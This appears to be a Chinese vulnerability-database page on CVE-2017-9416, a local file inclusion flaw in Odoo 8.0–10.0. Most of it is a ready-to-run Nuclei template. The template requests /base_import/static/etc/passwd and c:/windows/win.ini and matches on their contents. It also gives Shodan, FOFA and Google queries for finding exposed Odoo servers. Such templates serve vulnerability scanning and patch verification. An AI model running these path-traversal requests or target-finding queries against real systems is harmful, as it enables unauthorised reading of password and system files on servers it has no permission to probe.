CVE-2017-9416: Odoo 8.0/9.0/10.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Odoo | POC: 已公开

漏洞描述

Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2017-9416

info:
  name: Odoo 8.0/9.0/10.0 - Local File Inclusion
  author: Co5mos
  severity: medium
  description: |
    Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Allows an attacker to read arbitrary files on the server.
  remediation: |
    Upgrade to a patched version of Odoo or apply the necessary security patches.
  reference:
    - https://github.com/odoo/odoo/issues/17394
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9416
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2017-9416
    cwe-id: CWE-22
    epss-score: 0.50415
    epss-percentile: 0.977
    cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odoo
    product: odoo
    shodan-query:
      - cpe:"cpe:2.3:a:odoo:odoo"
      - http.title:"odoo"
    fofa-query: title="odoo"
    google-query: intitle:"odoo"
  tags: cve2017,cve,odoo,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/base_import/static/etc/passwd"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502206867ab3e109c34e792b33fa0eeded1d69c26816a757ff4df6b7e5e14c08262a4022100a218ed16633cbcd01894cd371ca263de8c056fde104d56a2cddac3fa765a8ef8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐